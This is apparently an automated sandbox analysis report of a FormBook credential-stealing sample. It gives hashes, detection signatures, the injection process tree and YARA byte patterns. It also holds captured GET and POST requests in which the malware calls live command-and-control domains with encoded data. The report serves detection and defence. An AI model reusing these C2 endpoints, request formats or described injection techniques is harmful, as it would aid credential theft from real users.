Windows Analysis Report
yZcecBUXN7.exe

Overview

General Information

Sample name: yZcecBUXN7.exe (renamed because original name is a hash value)
Original sample name: 9cd48f0d93c28ae6559409de23414554.exe
Analysis ID: 1435169
MD5: 9cd48f0d93c28ae6559409de23414554
SHA1: a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
SHA256: 3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
Tags: 32exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yZcecBUXN7.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
    • yZcecBUXN7.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
      • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 3688 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netsh.exe (PID: 6760 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 916 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x90f43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x7a482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
1.2.yZcecBUXN7.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.yZcecBUXN7.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x6be6b:$x1: In$J$ct0r
1.2.yZcecBUXN7.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.yZcecBUXN7.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cc63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x161a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= | Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shop/0hhg/ | Avira URL Cloud: Label: malware
            Source: http://www.dhleba51.ru/0hhg/ | Avira URL Cloud: Label: malware
            Source: http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= | Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shop | Avira URL Cloud: Label: malware
            Source: bnbuotqakx.shop | Virustotal: Detection: 5%
            Source: www.vavada-band.ru | Virustotal: Detection: 6%
            Source: http://www.bettaroom.ru/0hhg/ | Virustotal: Detection: 7%
            Source: yZcecBUXN7.exe | ReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exe | Virustotal: Detection: 37%
            Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: yZcecBUXN7.exe | Joe Sandbox ML: detected
            Source: yZcecBUXN7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: yZcecBUXN7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,4_2_00C1B710
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then xor eax, eax | 4_2_00C09350
            Source: Joe Sandbox View | IP Address: 203.161.50.127
            Source: Joe Sandbox View | IP Address: 195.24.68.5
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1Host: www.vavada-band.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1Host: www.whirledairlines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.quantummquest.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1Host: www.yamiyasheec.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.applesolve.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1Host: www.xxaiai.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1Host: www.dk48.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1Host: www.cucuzeus88.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.vavada-band.ru
            Source: global trafficDNS traffic detected: DNS query: www.bettaroom.ru
            Source: global trafficDNS traffic detected: DNS query: www.dhleba51.ru
            Source: global trafficDNS traffic detected: DNS query: www.dainikmirpur.com
            Source: global trafficDNS traffic detected: DNS query: www.whirledairlines.com
            Source: global trafficDNS traffic detected: DNS query: www.quantummquest.top
            Source: global trafficDNS traffic detected: DNS query: www.yamiyasheec.online
            Source: global trafficDNS traffic detected: DNS query: www.applesolve.com
            Source: global trafficDNS traffic detected: DNS query: www.xxaiai.top
            Source: global trafficDNS traffic detected: DNS query: www.vaesen.net
            Source: global trafficDNS traffic detected: DNS query: www.dk48.lol
            Source: global trafficDNS traffic detected: DNS query: www.cluird.cloud
            Source: global trafficDNS traffic detected: DNS query: www.cucuzeus88.store
            Source: global trafficDNS traffic detected: DNS query: www.bnbuotqakx.shop
            Source: unknownHTTP traffic detected: POST /0hhg/ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bettaroom.ruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 205Referer: http://www.bettaroom.ru/0hhg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:24:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 02 May 2024 06:25:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 
74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
